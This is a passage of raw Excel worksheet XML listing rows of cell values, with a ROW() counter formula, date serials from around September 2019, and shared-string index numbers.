      <c r="D19108" s="1">
        <v>43727</v>
      </c>
      <c r="F19108" t="s">
        <v>9975</v>
      </c>
      <c r="G19108" t="s">
        <v>30782</v>
      </c>
    </row>
    <row r="19109" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19109">
        <f t="shared" si="298"/>
        <v>19108</v>
      </c>
      <c r="B19109">
        <v>4108</v>
      </c>
      <c r="C19109" t="s">
        <v>25497</v>
      </c>
      <c r="D19109" s="1">
        <v>43712</v>
      </c>
      <c r="E19109" t="s">
        <v>26975</v>
      </c>
      <c r="F19109" t="s">
        <v>9975</v>
      </c>
      <c r="G19109" t="s">
        <v>30783</v>
      </c>
    </row>
    <row r="19110" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19110">
        <f t="shared" si="298"/>
        <v>19109</v>
      </c>
      <c r="B19110">
        <v>4109</v>
      </c>
      <c r="C19110" t="s">
        <v>25497</v>
      </c>
      <c r="D19110" s="1">
        <v>43728</v>
      </c>
      <c r="E19110" t="s">
        <v>25592</v>
      </c>
      <c r="F19110" t="s">
        <v>9975</v>
      </c>
      <c r="G19110" t="s">
        <v>30784</v>
      </c>
    </row>
    <row r="19111" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19111">
        <f t="shared" si="298"/>
        <v>19110</v>
      </c>
      <c r="B19111">
        <v>4110</v>
      </c>
      <c r="C19111" t="s">
        <v>25497</v>
      </c>
      <c r="D19111" s="1">
        <v>43716</v>
      </c>
      <c r="E19111" t="s">
        <v>30785</v>
      </c>
      <c r="F19111" t="s">
        <v>9975</v>
      </c>
      <c r="G19111" t="s">
        <v>30786</v>
      </c>
    </row>
    <row r="19112" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19112">
        <f t="shared" si="298"/>
        <v>19111</v>
      </c>
      <c r="B19112">
        <v>4111</v>
      </c>
      <c r="C19112" t="s">
        <v>25497</v>
      </c>
      <c r="D19112" s="1">
        <v>43725</v>
      </c>
      <c r="F19112" t="s">
        <v>10021</v>
      </c>
      <c r="G19112" t="s">
        <v>30787</v>
      </c>
    </row>
    <row r="19113" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19113">
        <f t="shared" si="298"/>
        <v>19112</v>
      </c>
      <c r="B19113">
        <v>4112</v>
      </c>
      <c r="C19113" t="s">
        <v>25497</v>
      </c>
      <c r="D19113" s="1">
        <v>43711</v>
      </c>
      <c r="F19113" t="s">
        <v>9975</v>
      </c>
      <c r="G19113" t="s">
        <v>30788</v>
      </c>
    </row>
    <row r="19114" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19114">
        <f t="shared" si="298"/>
        <v>19113</v>
      </c>
      <c r="B19114">
        <v>4113</v>
      </c>
      <c r="C19114" t="s">
        <v>25497</v>
      </c>
      <c r="D19114" s="1">
        <v>43720</v>
      </c>
      <c r="E19114" t="s">
        <v>25517</v>
      </c>
      <c r="F19114" t="s">
        <v>9975</v>
      </c>
      <c r="G19114" t="s">
        <v>30789</v>
      </c>
    </row>
    <row r="19115" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19115">
        <f t="shared" si="298"/>
        <v>19114</v>
      </c>
      <c r="B19115">
        <v>4114</v>
      </c>
      <c r="C19115" t="s">
        <v>25497</v>
      </c>
      <c r="D19115" s="1">
        <v>43711</v>
      </c>
      <c r="E19115" t="s">
        <v>30790</v>
      </c>
      <c r="F19115" t="s">
        <v>9975</v>
      </c>
      <c r="G19115" t="s">
        <v>30791</v>
      </c>
    </row>
    <row r="19116" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19116">
        <f t="shared" si="298"/>
        <v>19115</v>
      </c>
      <c r="B19116">
        <v>4115</v>
      </c>
      <c r="C19116" t="s">
        <v>25497</v>
      </c>
      <c r="D19116" s="1">
        <v>43735</v>
      </c>
      <c r="E19116" t="s">
        <v>19705</v>
      </c>
      <c r="F19116" t="s">
        <v>9975</v>
      </c>
      <c r="G19116" t="s">
        <v>30792</v>
      </c>
    </row>
    <row r="19117" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19117">
        <f t="shared" si="298"/>
        <v>19116</v>
      </c>
      <c r="B19117">
        <v>4116</v>
      </c>
      <c r="C19117" t="s">
        <v>25497</v>
      </c>
      <c r="D19117" s="1">
        <v>43722</v>
      </c>
      <c r="F19117" t="s">
        <v>10021</v>
      </c>
      <c r="G19117" t="s">
        <v>30793</v>
      </c>
    </row>
    <row r="19118" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19118">
        <f t="shared" si="298"/>
        <v>19117</v>
      </c>
      <c r="B19118">
        <v>4117</v>
      </c>
      <c r="C19118" t="s">
        <v>25497</v>
      </c>
      <c r="D19118" s="1">
        <v>43735</v>
      </c>
      <c r="E19118" t="s">
        <v>30794</v>
      </c>
      <c r="F19118" t="s">
        <v>9975</v>
      </c>
      <c r="G19118" t="s">
        <v>30795</v>
      </c>
    </row>
    <row r="19119" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19119">
        <f t="shared" si="298"/>
        <v>19118</v>
      </c>
      <c r="B19119">
        <v>4118</v>
      </c>
      <c r="C19119" t="s">
        <v>25497</v>
      </c>
      <c r="D19119" s="1">
        <v>43738</v>
      </c>
      <c r="E19119" t="s">
        <v>25517</v>
      </c>
      <c r="F19119" t="s">
        <v>9975</v>
      </c>
      <c r="G19119" t="s">
        <v>30796</v>
      </c>
    </row>
    <row r="19120" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19120">
        <f t="shared" si="298"/>
        <v>19119</v>
      </c>
      <c r="B19120">
        <v>4119</v>
      </c>
      <c r="C19120" t="s">
        <v>25497</v>
      </c>
      <c r="D19120" s="1">
        <v>43738</v>
      </c>
      <c r="E19120" t="s">
        <v>30797</v>
      </c>
      <c r="F19120" t="s">
        <v>9978</v>
      </c>
      <c r="G19120" t="s">
        <v>30798</v>
      </c>
    </row>
    <row r="19121" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19121">
        <f t="shared" si="298"/>
        <v>19120</v>
      </c>
      <c r="B19121">
        <v>4120</v>
      </c>
      <c r="C19121" t="s">
        <v>25497</v>
      </c>
      <c r="D19121" s="1">
        <v>43717</v>
      </c>
      <c r="F19121" t="s">
        <v>9975</v>
      </c>
      <c r="G19121" t="s">
        <v>30799</v>
      </c>
    </row>
    <row r="19122" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19122">
        <f t="shared" si="298"/>
        <v>19121</v>
      </c>
      <c r="B19122">
        <v>4121</v>
      </c>
      <c r="C19122" t="s">
        <v>25497</v>
      </c>
      <c r="D19122" s="1">
        <v>43710</v>
      </c>
      <c r="E19122" t="s">
        <v>30800</v>
      </c>
      <c r="F19122" t="s">
        <v>9975</v>
      </c>
      <c r="G19122" t="s">
        <v>30801</v>
      </c>
    </row>
    <row r="19123" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19123">
        <f t="shared" si="298"/>
        <v>19122</v>
      </c>
      <c r="B19123">
        <v>4122</v>
      </c>
      <c r="C19123" t="s">
        <v>25497</v>
      </c>
      <c r="D19123" s="1">
        <v>43720</v>
      </c>
      <c r="E19123" t="s">
        <v>30802</v>
      </c>
      <c r="F19123" t="s">
        <v>9975</v>
      </c>
      <c r="G19123" t="s">
        <v>30803</v>
      </c>
    </row>
    <row r="19124" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19124">
        <f t="shared" si="298"/>
        <v>19123</v>
      </c>
      <c r="B19124">
        <v>4123</v>
      </c>
      <c r="C19124" t="s">
        <v>25497</v>
      </c>
      <c r="D19124" s="1">
        <v>43719</v>
      </c>
      <c r="E19124" t="s">
        <v>30804</v>
      </c>
      <c r="F19124" t="s">
        <v>9975</v>
      </c>
      <c r="G19124" t="s">
        <v>30805</v>
      </c>
    </row>
    <row r="19125" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19125">
        <f t="shared" si="298"/>
        <v>19124</v>
      </c>
      <c r="B19125">
        <v>4124</v>
      </c>
      <c r="C19125" t="s">
        <v>25497</v>
      </c>
      <c r="D19125" s="1">
        <v>43715</v>
      </c>
      <c r="E19125" t="s">
        <v>30806</v>
      </c>
      <c r="F19125" t="s">
        <v>9975</v>
      </c>
      <c r="G19125" t="s">
        <v>30807</v>
      </c>
    </row>
    <row r="19126" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19126">
        <f t="shared" si="298"/>
        <v>19125</v>
      </c>
      <c r="B19126">
        <v>4125</v>
      </c>
      <c r="C19126" t="s">
        <v>25497</v>
      </c>
      <c r="D19126" s="1">
        <v>43733</v>
      </c>
      <c r="E19126" t="s">
        <v>25526</v>
      </c>
      <c r="F19126" t="s">
        <v>9975</v>
      </c>
      <c r="G19126" t="s">
        <v>30808</v>
      </c>
    </row>
    <row r="19127" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19127">
        <f t="shared" si="298"/>
        <v>19126</v>
      </c>
      <c r="B19127">
        <v>4126</v>
      </c>
      <c r="C19127" t="s">
        <v>25497</v>
      </c>
      <c r="D19127" s="1">
        <v>43710</v>
      </c>
      <c r="E19127" t="s">
        <v>19640</v>
      </c>
      <c r="F19127" t="s">
        <v>9975</v>
      </c>
      <c r="G19127" t="s">
        <v>30809</v>
      </c>
    </row>
    <row r="19128" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19128">
        <f t="shared" si="298"/>
        <v>19127</v>
      </c>
      <c r="B19128">
        <v>4127</v>
      </c>
      <c r="C19128" t="s">
        <v>25497</v>
      </c>
      <c r="D19128" s="1">
        <v>43738</v>
      </c>
      <c r="E19128" t="s">
        <v>25592</v>
      </c>
      <c r="F19128" t="s">
        <v>9975</v>
      </c>
      <c r="G19128" t="s">
        <v>30810</v>
      </c>
    </row>
    <row r="19129" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19129">
        <f t="shared" si="298"/>
        <v>19128</v>
      </c>
      <c r="B19129">
        <v>4128</v>
      </c>
      <c r="C19129" t="s">
        <v>25497</v>
      </c>
      <c r="D19129" s="1">
        <v>43725</v>
      </c>
      <c r="E19129" t="s">
        <v>30811</v>
      </c>
      <c r="F19129" t="s">
        <v>9975</v>
      </c>
      <c r="G19129" t="s">
        <v>30812</v>
      </c>
    </row>
    <row r="19130" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19130">
        <f t="shared" si="298"/>
        <v>19129</v>
      </c>
      <c r="B19130">
        <v>4129</v>
      </c>
      <c r="C19130" t="s">
        <v>25497</v>
      </c>
      <c r="D19130" s="1">
        <v>43727</v>
      </c>
      <c r="E19130" t="s">
        <v>19705</v>
      </c>
      <c r="F19130" t="s">
        <v>9975</v>
      </c>
      <c r="G19130" t="s">
        <v>30813</v>
      </c>
    </row>
    <row r="19131" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19131">
        <f t="shared" si="298"/>
        <v>19130</v>
      </c>
      <c r="B19131">
        <v>4130</v>
      </c>
      <c r="C19131" t="s">
        <v>25497</v>
      </c>
      <c r="D19131" s="1">
        <v>43719</v>
      </c>
      <c r="E19131" t="s">
        <v>25609</v>
      </c>
      <c r="F19131" t="s">
        <v>9975</v>
      </c>
      <c r="G19131" t="s">
        <v>30814</v>
      </c>
    </row>
    <row r="19132" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19132">
        <f t="shared" si="298"/>
        <v>19131</v>
      </c>
      <c r="B19132">
        <v>4131</v>
      </c>
      <c r="C19132" t="s">
        <v>25497</v>
      </c>
      <c r="D19132" s="1">
        <v>43723</v>
      </c>
      <c r="E19132" t="s">
        <v>25517</v>
      </c>
      <c r="F19132" t="s">
        <v>9975</v>
      </c>
      <c r="G19132" t="s">
        <v>30815</v>
      </c>
    </row>
    <row r="19133" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19133">
        <f t="shared" si="298"/>
        <v>19132</v>
      </c>
      <c r="B19133">
        <v>4132</v>
      </c>
      <c r="C19133" t="s">
        <v>25497</v>
      </c>
      <c r="D19133" s="1">
        <v>43722</v>
      </c>
      <c r="F19133" t="s">
        <v>9975</v>
      </c>
      <c r="G19133" t="s">
        <v>30816</v>
      </c>
    </row>
    <row r="19134" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19134">
        <f t="shared" si="298"/>
        <v>19133</v>
      </c>
      <c r="B19134">
        <v>4133</v>
      </c>
      <c r="C19134" t="s">
        <v>25497</v>
      </c>
      <c r="D19134" s="1">
        <v>43715</v>
      </c>
      <c r="F19134" t="s">
        <v>9975</v>
      </c>
      <c r="G19134" t="s">
        <v>30817</v>
      </c>
    </row>
    <row r="19135" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19135">
        <f t="shared" si="298"/>
        <v>19134</v>
      </c>
      <c r="B19135">
        <v>4134</v>
      </c>
      <c r="C19135" t="s">
        <v>25497</v>
      </c>
      <c r="D19135" s="1">
        <v>43728</v>
      </c>
      <c r="F19135" t="s">
        <v>9975</v>
      </c>
      <c r="G19135" t="s">
        <v>30818</v>
      </c>
    </row>
    <row r="19136" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19136">
        <f t="shared" si="298"/>
        <v>19135</v>
      </c>
      <c r="B19136">
        <v>4135</v>
      </c>
      <c r="C19136" t="s">
        <v>25497</v>
      </c>
      <c r="D19136" s="1">
        <v>43737</v>
      </c>
      <c r="F19136" t="s">
        <v>9975</v>
      </c>
      <c r="G19136" t="s">
        <v>30819</v>
      </c>
    </row>
    <row r="19137" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19137">
        <f t="shared" si="298"/>
        <v>19136</v>
      </c>
      <c r="B19137">
        <v>4136</v>
      </c>
      <c r="C19137" t="s">
        <v>25497</v>
      </c>
      <c r="D19137" s="1">
        <v>43715</v>
      </c>
      <c r="E19137" t="s">
        <v>30820</v>
      </c>
      <c r="F19137" t="s">
        <v>9975</v>
      </c>
      <c r="G19137" t="s">
        <v>30821</v>
      </c>
    </row>
    <row r="19138" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19138">
        <f t="shared" si="298"/>
        <v>19137</v>
      </c>
      <c r="B19138">
        <v>4137</v>
      </c>
      <c r="C19138" t="s">
        <v>25497</v>
      </c>
      <c r="D19138" s="1">
        <v>43735</v>
      </c>
      <c r="E19138" t="s">
        <v>29743</v>
      </c>
      <c r="F19138" t="s">
        <v>9975</v>
      </c>
      <c r="G19138" t="s">
        <v>30822</v>
      </c>
    </row>
    <row r="19139" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19139">
        <f t="shared" ref="A19139:A19202" si="299">+ROW(A19138)</f>
        <v>19138</v>
      </c>
      <c r="B19139">
        <v>4138</v>
      </c>
      <c r="C19139" t="s">
        <v>25497</v>
      </c>
      <c r="D19139" s="1">
        <v>43733</v>
      </c>
      <c r="E19139" t="s">
        <v>25517</v>
      </c>
      <c r="F19139" t="s">
        <v>9975</v>
      </c>
      <c r="G19139" t="s">
        <v>30823</v>
      </c>
    </row>
    <row r="19140" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19140">
        <f t="shared" si="299"/>
        <v>19139</v>
      </c>
      <c r="B19140">
        <v>4139</v>
      </c>
      <c r="C19140" t="s">
        <v>25497</v>
      </c>
      <c r="D19140" s="1">
        <v>43713</v>
      </c>
      <c r="F19140" t="s">
        <v>9975</v>
      </c>
      <c r="G19140" t="s">
        <v>30824</v>
      </c>
    </row>
    <row r="19141" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19141">
        <f t="shared" si="299"/>
        <v>19140</v>
      </c>
      <c r="B19141">
        <v>4140</v>
      </c>
      <c r="C19141" t="s">
        <v>25497</v>
      </c>
      <c r="D19141" s="1">
        <v>43724</v>
      </c>
      <c r="E19141" t="s">
        <v>19705</v>
      </c>
      <c r="F19141" t="s">
        <v>9975</v>
      </c>
      <c r="G19141" t="s">
        <v>30825</v>
      </c>
    </row>
    <row r="19142" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19142">
        <f t="shared" si="299"/>
        <v>19141</v>
      </c>
      <c r="B19142">
        <v>4141</v>
      </c>
      <c r="C19142" t="s">
        <v>25497</v>
      </c>
      <c r="D19142" s="1">
        <v>43715</v>
      </c>
      <c r="E19142" t="s">
        <v>26750</v>
      </c>
      <c r="F19142" t="s">
        <v>9975</v>
      </c>
      <c r="G19142" t="s">
        <v>30826</v>
      </c>
    </row>
    <row r="19143" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19143">
        <f t="shared" si="299"/>
        <v>19142</v>
      </c>
      <c r="B19143">
        <v>4142</v>
      </c>
      <c r="C19143" t="s">
        <v>25497</v>
      </c>
      <c r="D19143" s="1">
        <v>43731</v>
      </c>
      <c r="F19143" t="s">
        <v>10021</v>
      </c>
      <c r="G19143" t="s">
        <v>30827</v>
      </c>
    </row>
    <row r="19144" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19144">
        <f t="shared" si="299"/>
        <v>19143</v>
      </c>
      <c r="B19144">
        <v>4143</v>
      </c>
      <c r="C19144" t="s">
        <v>25497</v>
      </c>
      <c r="D19144" s="1">
        <v>43711</v>
      </c>
      <c r="F19144" t="s">
        <v>10021</v>
      </c>
      <c r="G19144" t="s">
        <v>30828</v>
      </c>
    </row>
    <row r="19145" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19145">
        <f t="shared" si="299"/>
        <v>19144</v>
      </c>
      <c r="B19145">
        <v>4144</v>
      </c>
      <c r="C19145" t="s">
        <v>25497</v>
      </c>
      <c r="D19145" s="1">
        <v>43714</v>
      </c>
      <c r="E19145" t="s">
        <v>19705</v>
      </c>
      <c r="F19145" t="s">
        <v>9975</v>
      </c>
      <c r="G19145" t="s">
        <v>30829</v>
      </c>
    </row>
    <row r="19146" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19146">
        <f t="shared" si="299"/>
        <v>19145</v>
      </c>
      <c r="B19146">
        <v>4145</v>
      </c>
      <c r="C19146" t="s">
        <v>25497</v>
      </c>
      <c r="D19146" s="1">
        <v>43731</v>
      </c>
      <c r="E19146" t="s">
        <v>30830</v>
      </c>
      <c r="F19146" t="s">
        <v>9978</v>
      </c>
      <c r="G19146" t="s">
        <v>30831</v>
      </c>
    </row>
    <row r="19147" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19147">
        <f t="shared" si="299"/>
        <v>19146</v>
      </c>
      <c r="B19147">
        <v>4146</v>
      </c>
      <c r="C19147" t="s">
        <v>25497</v>
      </c>
      <c r="D19147" s="1">
        <v>43723</v>
      </c>
      <c r="E19147" t="s">
        <v>30832</v>
      </c>
      <c r="F19147" t="s">
        <v>10526</v>
      </c>
      <c r="G19147" t="s">
        <v>30833</v>
      </c>
    </row>
    <row r="19148" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19148">
        <f t="shared" si="299"/>
        <v>19147</v>
      </c>
      <c r="B19148">
        <v>4147</v>
      </c>
      <c r="C19148" t="s">
        <v>25497</v>
      </c>
      <c r="D19148" s="1">
        <v>43724</v>
      </c>
      <c r="E19148" t="s">
        <v>30834</v>
      </c>
      <c r="F19148" t="s">
        <v>10021</v>
      </c>
      <c r="G19148" t="s">
        <v>30835</v>
      </c>
    </row>
    <row r="19149" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19149">
        <f t="shared" si="299"/>
        <v>19148</v>
      </c>
      <c r="B19149">
        <v>4148</v>
      </c>
      <c r="C19149" t="s">
        <v>25497</v>
      </c>
      <c r="D19149" s="1">
        <v>43732</v>
      </c>
      <c r="E19149" t="s">
        <v>25774</v>
      </c>
      <c r="F19149" t="s">
        <v>9975</v>
      </c>
      <c r="G19149" t="s">
        <v>30836</v>
      </c>
    </row>
    <row r="19150" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19150">
        <f t="shared" si="299"/>
        <v>19149</v>
      </c>
      <c r="B19150">
        <v>4149</v>
      </c>
      <c r="C19150" t="s">
        <v>25497</v>
      </c>
      <c r="D19150" s="1">
        <v>43731</v>
      </c>
      <c r="E19150" t="s">
        <v>30837</v>
      </c>
      <c r="F19150" t="s">
        <v>9975</v>
      </c>
      <c r="G19150" t="s">
        <v>30838</v>
      </c>
    </row>
    <row r="19151" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19151">
        <f t="shared" si="299"/>
        <v>19150</v>
      </c>
      <c r="B19151">
        <v>4150</v>
      </c>
      <c r="C19151" t="s">
        <v>25497</v>
      </c>
      <c r="D19151" s="1">
        <v>43713</v>
      </c>
      <c r="E19151" t="s">
        <v>30839</v>
      </c>
      <c r="F19151" t="s">
        <v>9978</v>
      </c>
      <c r="G19151" t="s">
        <v>30840</v>
      </c>
    </row>
    <row r="19152" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19152">
        <f t="shared" si="299"/>
        <v>19151</v>
      </c>
      <c r="B19152">
        <v>4151</v>
      </c>
      <c r="C19152" t="s">
        <v>25497</v>
      </c>
      <c r="D19152" s="1">
        <v>43727</v>
      </c>
      <c r="E19152" t="s">
        <v>25512</v>
      </c>
      <c r="F19152" t="s">
        <v>9975</v>
      </c>
      <c r="G19152" t="s">
        <v>30841</v>
      </c>
    </row>
    <row r="19153" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19153">
        <f t="shared" si="299"/>
        <v>19152</v>
      </c>
      <c r="B19153">
        <v>4152</v>
      </c>
      <c r="C19153" t="s">
        <v>25497</v>
      </c>
      <c r="D19153" s="1">
        <v>43731</v>
      </c>
      <c r="E19153" t="s">
        <v>25886</v>
      </c>
      <c r="F19153" t="s">
        <v>9975</v>
      </c>
      <c r="G19153" t="s">
        <v>30842</v>
      </c>
    </row>
    <row r="19154" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19154">
        <f t="shared" si="299"/>
        <v>19153</v>
      </c>
      <c r="B19154">
        <v>4153</v>
      </c>
      <c r="C19154" t="s">
        <v>25497</v>
      </c>
      <c r="D19154" s="1">
        <v>43735</v>
      </c>
      <c r="F19154" t="s">
        <v>9975</v>
      </c>
      <c r="G19154" t="s">
        <v>30843</v>
      </c>
    </row>
    <row r="19155" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19155">
        <f t="shared" si="299"/>
        <v>19154</v>
      </c>
      <c r="B19155">
        <v>4154</v>
      </c>
      <c r="C19155" t="s">
        <v>25497</v>
      </c>
      <c r="D19155" s="1">
        <v>43710</v>
      </c>
      <c r="E19155" t="s">
        <v>30844</v>
      </c>
      <c r="F19155" t="s">
        <v>9975</v>
      </c>
      <c r="G19155" t="s">
        <v>30845</v>
      </c>
    </row>
    <row r="19156" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19156">
        <f t="shared" si="299"/>
        <v>19155</v>
      </c>
      <c r="B19156">
        <v>4155</v>
      </c>
      <c r="C19156" t="s">
        <v>25497</v>
      </c>
      <c r="D19156" s="1">
        <v>43712</v>
      </c>
      <c r="F19156" t="s">
        <v>9975</v>
      </c>
      <c r="G19156" t="s">
        <v>30846</v>
      </c>
    </row>
    <row r="19157" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19157">
        <f t="shared" si="299"/>
        <v>19156</v>
      </c>
      <c r="B19157">
        <v>4156</v>
      </c>
      <c r="C19157" t="s">
        <v>25497</v>
      </c>
      <c r="D19157" s="1">
        <v>43732</v>
      </c>
      <c r="E19157" t="s">
        <v>25707</v>
      </c>
      <c r="F19157" t="s">
        <v>9978</v>
      </c>
      <c r="G19157" t="s">
        <v>30847</v>
      </c>
    </row>
    <row r="19158" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19158">
        <f t="shared" si="299"/>
        <v>19157</v>
      </c>
      <c r="B19158">
        <v>4157</v>
      </c>
      <c r="C19158" t="s">
        <v>25497</v>
      </c>
      <c r="D19158" s="1">
        <v>43726</v>
      </c>
      <c r="E19158" t="s">
        <v>21225</v>
      </c>
      <c r="F19158" t="s">
        <v>10526</v>
      </c>
      <c r="G19158" t="s">
        <v>30848</v>
      </c>
    </row>
    <row r="19159" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19159">
        <f t="shared" si="299"/>
        <v>19158</v>
      </c>
      <c r="B19159">
        <v>4158</v>
      </c>
      <c r="C19159" t="s">
        <v>25497</v>
      </c>
      <c r="D19159" s="1">
        <v>43716</v>
      </c>
      <c r="F19159" t="s">
        <v>9975</v>
      </c>
      <c r="G19159" t="s">
        <v>30849</v>
      </c>
    </row>
    <row r="19160" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19160">
        <f t="shared" si="299"/>
        <v>19159</v>
      </c>
      <c r="B19160">
        <v>4159</v>
      </c>
      <c r="C19160" t="s">
        <v>25497</v>
      </c>
      <c r="D19160" s="1">
        <v>43736</v>
      </c>
      <c r="E19160" t="s">
        <v>30850</v>
      </c>
      <c r="F19160" t="s">
        <v>9975</v>
      </c>
      <c r="G19160" t="s">
        <v>30851</v>
      </c>
    </row>
    <row r="19161" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19161">
        <f t="shared" si="299"/>
        <v>19160</v>
      </c>
      <c r="B19161">
        <v>4160</v>
      </c>
      <c r="C19161" t="s">
        <v>25497</v>
      </c>
      <c r="D19161" s="1">
        <v>43720</v>
      </c>
      <c r="E19161" t="s">
        <v>25517</v>
      </c>
      <c r="F19161" t="s">
        <v>9975</v>
      </c>
      <c r="G19161" t="s">
        <v>30852</v>
      </c>
    </row>
    <row r="19162" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19162">
        <f t="shared" si="299"/>
        <v>19161</v>
      </c>
      <c r="B19162">
        <v>4161</v>
      </c>
      <c r="C19162" t="s">
        <v>25497</v>
      </c>
      <c r="D19162" s="1">
        <v>43727</v>
      </c>
      <c r="E19162" t="s">
        <v>30853</v>
      </c>
      <c r="F19162" t="s">
        <v>10021</v>
      </c>
      <c r="G19162" t="s">
        <v>30854</v>
      </c>
    </row>
    <row r="19163" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19163">
        <f t="shared" si="299"/>
        <v>19162</v>
      </c>
      <c r="B19163">
        <v>4162</v>
      </c>
      <c r="C19163" t="s">
        <v>25497</v>
      </c>
      <c r="D19163" s="1">
        <v>43727</v>
      </c>
      <c r="E19163" t="s">
        <v>25512</v>
      </c>
      <c r="F19163" t="s">
        <v>9975</v>
      </c>
      <c r="G19163" t="s">
        <v>30855</v>
      </c>
    </row>
    <row r="19164" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19164">
        <f t="shared" si="299"/>
        <v>19163</v>
      </c>
      <c r="B19164">
        <v>4163</v>
      </c>
      <c r="C19164" t="s">
        <v>25497</v>
      </c>
      <c r="D19164" s="1">
        <v>43727</v>
      </c>
      <c r="E19164" t="s">
        <v>25592</v>
      </c>
      <c r="F19164" t="s">
        <v>9975</v>
      </c>
      <c r="G19164" t="s">
        <v>30856</v>
      </c>
    </row>
    <row r="19165" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19165">
        <f t="shared" si="299"/>
        <v>19164</v>
      </c>
      <c r="B19165">
        <v>4164</v>
      </c>
      <c r="C19165" t="s">
        <v>25497</v>
      </c>
      <c r="D19165" s="1">
        <v>43734</v>
      </c>
      <c r="F19165" t="s">
        <v>9975</v>
      </c>
      <c r="G19165" t="s">
        <v>30857</v>
      </c>
    </row>
    <row r="19166" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19166">
        <f t="shared" si="299"/>
        <v>19165</v>
      </c>
      <c r="B19166">
        <v>4165</v>
      </c>
      <c r="C19166" t="s">
        <v>25497</v>
      </c>
      <c r="D19166" s="1">
        <v>43731</v>
      </c>
      <c r="E19166" t="s">
        <v>30858</v>
      </c>
      <c r="F19166" t="s">
        <v>9975</v>
      </c>
      <c r="G19166" t="s">
        <v>30859</v>
      </c>
    </row>
    <row r="19167" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19167">
        <f t="shared" si="299"/>
        <v>19166</v>
      </c>
      <c r="B19167">
        <v>4166</v>
      </c>
      <c r="C19167" t="s">
        <v>25497</v>
      </c>
      <c r="D19167" s="1">
        <v>43712</v>
      </c>
      <c r="E19167" t="s">
        <v>30860</v>
      </c>
      <c r="F19167" t="s">
        <v>10526</v>
      </c>
      <c r="G19167" t="s">
        <v>30861</v>
      </c>
    </row>
    <row r="19168" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19168">
        <f t="shared" si="299"/>
        <v>19167</v>
      </c>
      <c r="B19168">
        <v>4167</v>
      </c>
      <c r="C19168" t="s">
        <v>25497</v>
      </c>
      <c r="D19168" s="1">
        <v>43738</v>
      </c>
      <c r="F19168" t="s">
        <v>9975</v>
      </c>
      <c r="G19168" t="s">
        <v>30862</v>
      </c>
    </row>
    <row r="19169" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19169">
        <f t="shared" si="299"/>
        <v>19168</v>
      </c>
      <c r="B19169">
        <v>4168</v>
      </c>
      <c r="C19169" t="s">
        <v>25497</v>
      </c>
      <c r="D19169" s="1">
        <v>43734</v>
      </c>
      <c r="E19169" t="s">
        <v>25517</v>
      </c>
      <c r="F19169" t="s">
        <v>9975</v>
      </c>
      <c r="G19169" t="s">
        <v>30863</v>
      </c>
    </row>
    <row r="19170" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19170">
        <f t="shared" si="299"/>
        <v>19169</v>
      </c>
      <c r="B19170">
        <v>4169</v>
      </c>
      <c r="C19170" t="s">
        <v>25497</v>
      </c>
      <c r="D19170" s="1">
        <v>43727</v>
      </c>
      <c r="E19170" t="s">
        <v>19672</v>
      </c>
      <c r="F19170" t="s">
        <v>9975</v>
      </c>
      <c r="G19170" t="s">
        <v>30864</v>
      </c>
    </row>
    <row r="19171" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19171">
        <f t="shared" si="299"/>
        <v>19170</v>
      </c>
      <c r="B19171">
        <v>4170</v>
      </c>
